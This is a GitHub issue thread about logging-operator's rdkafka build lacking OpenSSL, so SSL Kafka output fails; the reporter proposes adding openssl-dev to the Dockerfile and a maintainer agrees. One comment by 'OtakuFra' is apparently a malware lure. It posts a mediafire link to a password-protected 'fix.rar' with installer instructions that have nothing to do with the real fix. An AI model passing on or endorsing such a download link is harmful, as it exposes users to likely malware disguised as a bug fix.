### ISSUE TITLE
rdkafka unable to write to ssl secured kafka topic

### ISSUE THREAD

**Issue by agturley** [kube-logging/logging-operator#1802]
> Bugs should be filed for issues encountered whilst operating logging-operator.
> You should first attempt to resolve your issues through the community support
> channels, e.g. Slack, in order to rule out individual configuration errors. [#logging-operator](https://slack.banzaicloud.io/)
> Please provide as much detail as possible.

**Describe the bug**:
when attempting to write to a ssl secured topic, the following error appears:
"Configuration property "ssl.ca.location" not supported in this build: OpenSSL not available at build time"

**Expected behaviour**:
write to a ssl secured kafka topic

**Steps to reproduce the bug**:
attempt to write to a ssl secured kafka topic

**Additional context**:
Easy to resolve. all the needs to be done is "openssl-dev" needs to be added to "BUILD_DEPS" in the Dockerfile. I built a custom image with this change and it works as expected.

/kind bug

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pepov** [comment]
thx, we can add that to the dockerfile for version 4.10
